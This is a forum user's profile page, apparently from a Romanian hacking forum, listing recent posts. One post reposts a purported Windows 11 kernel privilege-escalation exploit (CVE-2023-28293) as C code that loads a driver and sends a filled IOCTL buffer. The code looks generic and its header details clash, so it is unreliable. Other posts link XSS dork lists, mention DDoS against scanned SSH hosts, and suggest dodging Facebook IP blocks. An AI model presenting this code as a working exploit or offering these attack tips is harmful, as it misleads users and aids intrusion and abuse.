Jump to content

GabrielRo

Active Members
  • Posts

    82
  • Joined

  • Last visited

  • Days Won

    3

GabrielRo last won the day on December 10 2022

GabrielRo had the most liked content!

1 Follower

Profile Information

  • Gender
    Male

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

GabrielRo's Achievements

Collaborator

Collaborator (7/14)

  • Collaborator Rare
  • Reacting Well Rare
  • One Year In Rare
  • Dedicated Rare
  • First Post Rare

Recent Badges

39

Reputation

  1. Ai mai putea adauga, sa gaseasca xss dupa dorks. https://github.com/DevanshRaghav75/bugbounty-dorks/blob/main/dorks/xss_dorks.txt
  2. Felicitari!, tie tata!
  3. Interesant, mulțumim!
  4. https://superbet.ro/security.txt
  5. Nu, sunt născut în anul 1987 😅😅
  6. Maturizeaza-te kid!
  7. // Exploit Title: Windows 11 22h2 - Kernel Privilege Elevation // Date: 2023-06-20 // country: Iran // Exploit Author: Amirhossein Bahramizadeh // Category : webapps // Vendor Homepage: // Tested on: Windows/Linux // CVE : CVE-2023-28293 #include <windows.h> #include <stdio.h> // The vulnerable driver file name const char *driver_name = "vuln_driver.sys"; // The vulnerable driver device name const char *device_name = "\\\\.\\VulnDriver"; // The IOCTL code to trigger the vulnerability #define IOCTL_VULN_CODE 0x222003 // The buffer size for the IOCTL input/output data #define IOCTL_BUFFER_SIZE 0x1000 int main() { HANDLE device; DWORD bytes_returned; char input_buffer[IOCTL_BUFFER_SIZE]; char output_buffer[IOCTL_BUFFER_SIZE]; // Load the vulnerable driver if (!LoadDriver(driver_name, "\\Driver\\VulnDriver")) { printf("Error loading vulnerable driver: %d\n", GetLastError()); return 1; } // Open the vulnerable driver device device = CreateFile(device_name, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (device == INVALID_HANDLE_VALUE) { printf("Error opening vulnerable driver device: %d\n", GetLastError()); return 1; } // Fill the input buffer with data to trigger the vulnerability memset(input_buffer, 'A', IOCTL_BUFFER_SIZE); // Send the IOCTL to trigger the vulnerability if (!DeviceIoControl(device, IOCTL_VULN_CODE, input_buffer, IOCTL_BUFFER_SIZE, output_buffer, IOCTL_BUFFER_SIZE, &bytes_returned, NULL)) { printf("Error sending IOCTL: %d\n", GetLastError()); return 1; } // Print the output buffer contents printf("Output buffer:\n%s\n", output_buffer); // Unload the vulnerable driver if (!UnloadDriver("\\Driver\\VulnDriver")) { printf("Error unloading vulnerable driver: %d\n", GetLastError()); return 1; } // Close the vulnerable driver device CloseHandle(device); return 0; } BOOL LoadDriver(LPCTSTR driver_name, LPCTSTR service_name) { SC_HANDLE sc_manager, service; DWORD error; // Open the Service Control Manager sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); if (sc_manager == NULL) { return FALSE; } // Create the service service = CreateService(sc_manager, service_name, service_name, SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, driver_name, NULL, NULL, NULL, NULL, NULL); if (service == NULL) { error = GetLastError(); if (error == ERROR_SERVICE_EXISTS) { // The service already exists, so open it instead service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS); if (service == NULL) { CloseServiceHandle(sc_manager); return FALSE; } } else { CloseServiceHandle(sc_manager); return FALSE; } } // Start the service if (!StartService(service, 0, NULL)) { error = GetLastError(); if (error != ERROR_SERVICE_ALREADY_RUNNING) { CloseServiceHandle(service); CloseServiceHandle(sc_manager); return FALSE; } } CloseServiceHandle(service); CloseServiceHandle(sc_manager); return TRUE; } BOOL UnloadDriver(LPCTSTR service_name) { SC_HANDLE sc_manager, service; SERVICE_STATUS status; DWORD error; // Open the Service Control Manager sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); if (sc_manager == NULL) { return FALSE; } // Open the service service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS); if (service == NULL) { CloseServiceHandle(sc_manager); return FALSE; } // Stop the service if (!ControlService(service, SERVICE_CONTROL_STOP, &status)) { error = GetLastError(); if (error != ERROR_SERVICE_NOT_ACTIVE) { CloseServiceHandle(service); CloseServiceHandle(sc_manager); return FALSE; } } // Delete the service if (!DeleteService(service)) { CloseServiceHandle(service); CloseServiceHandle(sc_manager); return FALSE; } CloseServiceHandle(service); CloseServiceHandle(sc_manager); return TRUE; } Source: https://www.exploit-db.com/exploits/51544
  8. Si ce dracu` faci cu un ssh? ma intreb si eu.. urci arhiva udp.pl pe el si dai ddos pe un ssh prins in scanner`ul tau.
  9. https://www.aktual24.ro/hackerii-care-l-au-aparat-pe-andrew-tate-sunt-din-buzau-si-vaslui-diicot-a-reusit-sa-i-prinda-opt-dintre-ei-au-fost-retinuti/?fbclid=IwAR11Vm5V4a4NIgrTUYjqSmUzoOhtTZ_xbS9IOVkadrDXQbCd8Ilj6SjZ72A 🤐
      • 1
      • Haha
  10. Salut! Dacă încerci sa-ti faci conturi cu același IP, facebook îți recunoaște ip-ul, și te blochează automat după crearea contului, încearcă sa-ti faci cont cu un vpn, sau revi cu crearea contului mai târziu.
  11. Bro suntem în anul 2023, tu crezi ca mai funcționează UDP.pl si scan!
  12. De ce nu-ti faci tu niște conturi?
  13. https://www.sysnettechsolutions.com/en/install-gns3-kali-linux/
  14. https://youtu.be/FtFTh-KVjsA
×
×
  • Create New...